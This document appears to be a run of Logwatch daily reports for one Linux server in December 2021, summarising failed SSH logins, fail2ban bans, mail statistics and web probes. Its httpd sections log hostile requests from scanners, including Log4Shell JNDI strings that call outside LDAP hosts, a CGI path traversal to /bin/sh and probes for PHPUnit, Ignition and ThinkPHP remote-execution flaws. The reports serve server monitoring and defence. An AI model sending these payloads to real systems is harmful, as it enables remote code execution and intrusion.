root (1.116.155.182): 13 Time(s)
unknown (49.234.30.113): 13 Time(s)
unknown (111.229.4.66): 12 Time(s)
unknown (189.180.31.18): 12 Time(s)
root (201-0-89-142.dsl.telesp.net.br): 10 Time(s)
unknown (120.133.56.246): 9 Time(s)
unknown (165.22.220.159): 8 Time(s)
unknown (201-0-89-142.dsl.telesp.net.br): 8 Time(s)
unknown (36.91.119.221): 8 Time(s)
unknown (139.198.4.166): 7 Time(s)
unknown (203.160.55.212): 6 Time(s)
root (189.180.31.18): 4 Time(s)
unknown (1.116.155.182): 4 Time(s)
root (112.19.174.226): 2 Time(s)
root (176.111.173.226): 2 Time(s)
unknown (109.166.153.103): 2 Time(s)
unknown (176.111.173.226): 2 Time(s)
unknown (189.195.123.28): 2 Time(s)
unknown (189.230.37.114): 2 Time(s)
unknown (77.118.110.71.wireless.dyn.drei.com): 2 Time(s)
unknown (h-155-4-0-67.a147.priv.bahnhof.se): 2 Time(s)
unknown (pasarelalora.electron.uv.es): 2 Time(s)
postgres (139.198.4.166): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (189.195.123.28): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (23.154.177.4): 1 Time(s)
Invalid Users:
Unknown Account: 123 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
10.358K Bytes accepted 10,607
10.358K Bytes sent via SMTP 10,607
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
14 Connections
5 Connections lost (inbound)
14 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.116.155.182: 13 times
36.91.119.221: 24 times
49.234.30.113: 37 times
111.229.4.66: 33 times
112.19.174.226: 2 times
120.133.56.246: 21 times
121.4.118.208: 32 times
139.198.4.166: 15 times
164.90.203.55: 1 time
165.22.220.159: 20 times
176.111.173.226: 2 times
189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 4 times
189.195.123.28 (customer-PUE-123-28.megared.net.mx): 1 time
201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 10 times
203.160.55.212: 25 times
Illegal users from:
2001:470:1:332::9: 1 time
undef: 85 times
1.116.155.182: 4 times
2.57.121.35 (smtp35.kcmoa.com): 1 time
23.154.177.4: 1 time
36.91.119.221: 8 times
49.234.30.113: 13 times
64.62.197.122: 1 time
77.118.110.71 (77.118.110.71.wireless.dyn.drei.com): 2 times
109.166.153.103: 2 times
111.229.4.66: 12 times
120.133.56.246: 9 times
121.4.118.208: 18 times
134.236.247.145: 1 time
139.198.4.166: 7 times
141.98.10.202: 1 time
146.185.79.101: 1 time
147.156.82.79 (pasarelalora.electron.uv.es): 2 times
155.4.0.67 (h-155-4-0-67.A147.priv.bahnhof.se): 2 times
165.22.220.159: 8 times
176.111.173.226: 2 times
189.180.31.18 (dsl-189-180-31-18-dyn.prod-infinitum.com.mx): 12 times
189.195.123.28 (customer-PUE-123-28.megared.net.mx): 2 times
189.230.37.114 (dsl-189-230-37-114-dyn.prod-infinitum.com.mx): 2 times
201.0.89.142 (201-0-89-142.dsl.telesp.net.br): 8 times
203.160.55.212: 6 times
**Unmatched Entries**
Protocol major versions differ for 216.238.73.231: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 2 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Dec 18 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-17 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 32:32 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 7 sites probed the server
103.153.76.212
157.245.102.144
20.101.106.180
205.185.124.100
216.238.73.231
61.219.11.151
64.227.41.14
Requests with error response codes
400 Bad Request
null: 11 Time(s)
mstshash=Domain: 4 Time(s)
/config/getuser?index=0: 3 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... -MF3zWbyg92AADk: 3 Time(s)
mstshash=Administr: 3 Time(s)
/: 2 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... FX0JBEznOXtAADg: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
7: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
D\xF0^\xC4\xCA\x16a\xE2\x8Ef\x8Cs\x0C\x97\ ... C0$\x13\x05\xC0: 1 Time(s)
HTTP/1.0: 1 Time(s)
xmlns:xsd=\x22http://www.w3.org/2001/XMLSchema\x22: 1 Time(s)
499 (undefined)
/: 10 Time(s)
/${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 29 Time(s)
/.env: 7 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?id=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2 ... lxgpsjkgfrra%7D: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/favicon.ico: 1 Time(s)
/fuel: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/nice%20ports%2C/Tri%6Eity.txt%2ebak: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (180.76.57.58): 36 Time(s)
root (139.59.228.214): 35 Time(s)
root (r201-217-143-51.ir-static.anteldata.net.uy): 33 Time(s)
root (50.142.80.34.bc.googleusercontent.com): 26 Time(s)
unknown (114.80.85.75): 21 Time(s)
root (113.110.166.25): 20 Time(s)
unknown (201.119.167.25): 20 Time(s)
root (106.13.6.113): 19 Time(s)
unknown (r201-217-143-51.ir-static.anteldata.net.uy): 17 Time(s)
unknown (139.59.228.214): 15 Time(s)
unknown (50.142.80.34.bc.googleusercontent.com): 12 Time(s)
root (113.116.5.156): 11 Time(s)
root (203.160.55.212): 11 Time(s)
unknown (106.13.6.113): 11 Time(s)
unknown (180.76.57.58): 11 Time(s)
root (ns3152155.ip-151-106-38.eu): 10 Time(s)
root (201.119.167.25): 9 Time(s)
root (60.255.230.126): 8 Time(s)
unknown (203.160.55.212): 8 Time(s)
unknown (113.110.166.25): 6 Time(s)
root (178-117-237-173.access.telenet.be): 5 Time(s)
unknown (128.187.26.211.sta.commander.net.au): 5 Time(s)
unknown (60.255.230.126): 5 Time(s)
unknown (ns3152155.ip-151-106-38.eu): 5 Time(s)
root (179.112.19.24): 4 Time(s)
root (115.248.153.89): 2 Time(s)
root (128.187.26.211.sta.commander.net.au): 2 Time(s)
unknown (176.125.36.117): 2 Time(s)
unknown (194.61.26.211): 2 Time(s)
unknown (2.195.224.165): 2 Time(s)
unknown (220.177.194.10): 2 Time(s)
unknown (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 Time(s)
unknown (59.29.227.55): 2 Time(s)
backup (194.61.26.211): 1 Time(s)
postgres (46.161.27.162): 1 Time(s)
root (1.15.181.252): 1 Time(s)
root (103.133.57.250): 1 Time(s)
root (164.90.203.55): 1 Time(s)
root (182.74.25.246): 1 Time(s)
root (189.254.255.3): 1 Time(s)
root (210.74.11.97): 1 Time(s)
temp (50.142.80.34.bc.googleusercontent.com): 1 Time(s)
unknown (115.248.153.89): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (146.185.79.101): 1 Time(s)
unknown (178-117-237-173.access.telenet.be): 1 Time(s)
unknown (179.112.19.24): 1 Time(s)
unknown (server.kompraqui.com): 1 Time(s)
Invalid Users:
Unknown Account: 154 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
1 Miscellaneous warnings
8.837K Bytes accepted 9,049
8.837K Bytes sent via SMTP 9,049
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
4 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
4 Total 4xx Rejects 100.00%
======== ==================================================
38 Connections
28 Connections lost (inbound)
38 Disconnections
1 Removed from queue
1 Sent via SMTP
1 SMTP dialog errors
2 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
1.15.181.252: 1 time
34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 27 times
46.161.27.162: 1 time
60.255.230.126: 8 times
103.133.57.250: 1 time
106.13.6.113: 19 times
113.110.166.25: 20 times
113.116.5.156: 11 times
115.248.153.89: 2 times
139.59.228.214: 35 times
151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times
164.90.203.55: 1 time
178.117.237.173 (178-117-237-173.access.telenet.be): 5 times
179.112.19.24 (179-112-19-24.user.vivozap.com.br): 4 times
180.76.57.58: 36 times
182.74.25.246: 1 time
189.254.255.3 (customer-189-254-255-3-sta.uninet-ide.com.mx): 1 time
194.61.26.211: 1 time
201.119.167.25: 9 times
201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 33 times
203.160.55.212: 11 times
210.74.11.97: 1 time
211.26.187.128 (128.187.26.211.sta.commander.net.au): 2 times
Illegal users from:
2001:470:1:c84::29: 1 time
undef: 121 times
2.195.224.165: 2 times
34.80.142.50 (50.142.80.34.bc.googleusercontent.com): 12 times
59.29.227.55: 2 times
60.255.230.126: 5 times
64.62.197.152: 1 time
91.182.94.240 (240.94-182-91.adsl-dyn.isp.belgacom.be): 2 times
106.13.6.113: 11 times
113.110.166.25: 6 times
114.80.85.75: 21 times
115.248.153.89: 1 time
134.236.247.145: 1 time
139.59.228.214: 15 times
146.185.79.101: 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 5 times
154.89.5.72: 1 time
162.214.53.159 (server.kompraqui.com): 1 time
176.125.36.117 (117-36-125-176.wifipon-rsbit.uar.net): 2 times
178.117.237.173 (178-117-237-173.access.telenet.be): 1 time
179.112.19.24 (179-112-19-24.user.vivozap.com.br): 1 time
180.76.57.58: 11 times
194.61.26.211: 2 times
201.119.167.25: 20 times
201.217.143.51 (r201-217-143-51.ir-static.anteldata.net.uy): 17 times
203.160.55.212: 8 times
211.26.187.128 (128.187.26.211.sta.commander.net.au): 5 times
220.177.194.10: 2 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Fri Dec 17 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-16 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 23:23 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 9 sites probed the server
117.198.250.231
156.251.172.207
167.71.102.95
178.72.75.84
20.101.106.180
20.121.13.154
61.219.11.151
66.240.205.34
66.240.219.146
Requests with error response codes
400 Bad Request
null: 17 Time(s)
mstshash=Administr: 2 Time(s)
mstshash=Domain: 2 Time(s)
/.git/config: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/pVOG: 1 Time(s)
\xB1\xC5\xDC(\xE8\x00\x00\x00\x00\x00: 1 Time(s)
404 Not Found
//2018/wp-includes/wlwmanifest.xml: 1 Time(s)
//2019/wp-includes/wlwmanifest.xml: 1 Time(s)
//blog/wp-includes/wlwmanifest.xml: 1 Time(s)
//cms/wp-includes/wlwmanifest.xml: 1 Time(s)
//media/wp-includes/wlwmanifest.xml: 1 Time(s)
//news/wp-includes/wlwmanifest.xml: 1 Time(s)
//shop/wp-includes/wlwmanifest.xml: 1 Time(s)
//site/wp-includes/wlwmanifest.xml: 1 Time(s)
//sito/wp-includes/wlwmanifest.xml: 1 Time(s)
//test/wp-includes/wlwmanifest.xml: 1 Time(s)
//web/wp-includes/wlwmanifest.xml: 1 Time(s)
//website/wp-includes/wlwmanifest.xml: 1 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp-includes/wlwmanifest.xml: 1 Time(s)
//wp/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
//xmlrpc.php?rsd: 1 Time(s)
499 (undefined)
/: 5 Time(s)
/${jndi:ldap://31.131.16.127:1389/Exploit}: 1 Time(s)
/login: 1 Time(s)
500 Internal Server Error
/: 30 Time(s)
/.env: 4 Time(s)
/Autodiscover/Autodiscover.xml: 2 Time(s)
/_ignition/execute-solution: 2 Time(s)
/console/: 2 Time(s)
/robots.txt: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.git/config: 1 Time(s)
/.well-known/security.txt: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/favicon.ico: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/remote/login?lang=en: 1 Time(s)
/sitemap.xml: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (159.75.216.168): 37 Time(s)
root (212.64.91.71): 34 Time(s)
root (61.160.251.98): 20 Time(s)
root (223.99.170.130): 18 Time(s)
unknown (212.64.91.71): 16 Time(s)
root (106.13.27.134): 15 Time(s)
unknown (61.160.251.98): 15 Time(s)
unknown (159.75.216.168): 13 Time(s)
root (ns3152155.ip-151-106-38.eu): 12 Time(s)
unknown (ns3152155.ip-151-106-38.eu): 10 Time(s)
root (96.78.175.36): 9 Time(s)
root (164.90.217.133): 7 Time(s)
unknown (106.13.27.134): 7 Time(s)
root (161.35.205.46): 6 Time(s)
root (177.249.43.20): 6 Time(s)
root (175.209.89.234): 5 Time(s)
unknown (164.90.217.133): 5 Time(s)
unknown (96.78.175.36): 5 Time(s)
root (117.66.243.77): 4 Time(s)
root (45.124.144.116): 3 Time(s)
unknown (223.99.170.130): 3 Time(s)
unknown (114.30.126.78.rev.sfr.net): 2 Time(s)
unknown (117.89.142.214): 2 Time(s)
unknown (161.35.205.46): 2 Time(s)
unknown (195.141.53.65): 2 Time(s)
unknown (65.212.254.95): 2 Time(s)
unknown (c193-183-241-159.customer.sandnet.se): 2 Time(s)
mysql (164.90.217.133): 1 Time(s)
news (180.250.248.169): 1 Time(s)
root (36.110.142.212): 1 Time(s)
root (oc-144-21-87-42.compute.oraclecloud.com): 1 Time(s)
unknown (117.66.243.77): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (175.209.89.234): 1 Time(s)
unknown (45.124.144.116): 1 Time(s)
unknown (45.141.84.10): 1 Time(s)
Invalid Users:
Unknown Account: 91 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
2 Miscellaneous warnings
8.896K Bytes accepted 9,109
8.896K Bytes sent via SMTP 9,109
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
26 Connections
14 Connections lost (inbound)
26 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Timeouts (inbound)
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
36.110.142.212: 1 time
45.124.144.116: 3 times
61.160.251.98: 20 times
96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 9 times
106.13.27.134: 15 times
117.66.243.77: 4 times
144.21.87.42 (oc-144-21-87-42.compute.oraclecloud.com): 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 12 times
159.75.216.168: 37 times
161.35.205.46: 6 times
164.90.217.133: 8 times
175.209.89.234: 5 times
177.249.43.20 (177.249.43.20-clientes-zap-izzi.mx): 6 times
180.250.248.169: 1 time
212.64.91.71: 34 times
223.99.170.130: 18 times
Illegal users from:
2001:470:1:332::8: 1 time
undef: 61 times
45.124.144.116: 1 time
45.141.84.10: 1 time
61.160.251.98: 15 times
64.62.197.152: 1 time
65.212.254.95: 2 times
78.126.30.114 (114.30.126.78.rev.sfr.net): 2 times
96.78.175.36 (96-78-175-36-static.hfc.comcastbusiness.net): 5 times
106.13.27.134: 7 times
117.66.243.77: 1 time
117.89.142.214: 2 times
141.98.10.202: 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 10 times
159.75.216.168: 13 times
161.35.205.46: 2 times
164.90.217.133: 5 times
175.209.89.234: 1 time
178.73.215.171 (178-73-215-171-static.glesys.net): 1 time
193.183.241.159 (c193-183-241-159.customer.sandnet.se): 2 times
195.141.53.65: 2 times
212.64.91.71: 16 times
223.99.170.130: 3 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Dec 16 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-15 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 25:25 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 4 sites probed the server
159.89.116.96
167.99.82.16
183.167.205.82
67.207.84.198
Requests with error response codes
400 Bad Request
mstshash=Administr: 13 Time(s)
null: 12 Time(s)
/config/getuser?index=0: 4 Time(s)
/: 3 Time(s)
mstshash=Domain: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... CQ1Cy5usQUqAABy: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... wv0JCy1YeZ2AABz: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
/zALU: 1 Time(s)
7: 1 Time(s)
HTTP/1.0: 1 Time(s)
XP|'|'|No|'|'|0.6.4|'|'|..|'|'||'|'|[endof]: 1 Time(s)
\xA3\x85H\xED\xCB\x85_\xAB^: 1 Time(s)
\xB1\xBET\xA4\x9AZ\x9A\xA0?\x90\xE0\xF2t0\ ... J\xA9<\xBD\xDA`: 1 Time(s)
499 (undefined)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... CQ1Cy5usQUqAABy: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... Gabaq-kQahdAAB0: 1 Time(s)
/socket.io/?noteId=37Wy_2oZREmwoRnOgX-yAA& ... wv0JCy1YeZ2AABz: 1 Time(s)
500 Internal Server Error
/: 19 Time(s)
/.env: 7 Time(s)
/robots.txt: 5 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/ReportServer: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/_profiler/phpinfo: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/debug/default/view?panel=config: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/login: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 135 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
5 Miscellaneous warnings
8.895K Bytes accepted 9,108
8.895K Bytes sent via SMTP 9,108
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
25 Connections
14 Connections lost (inbound)
25 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months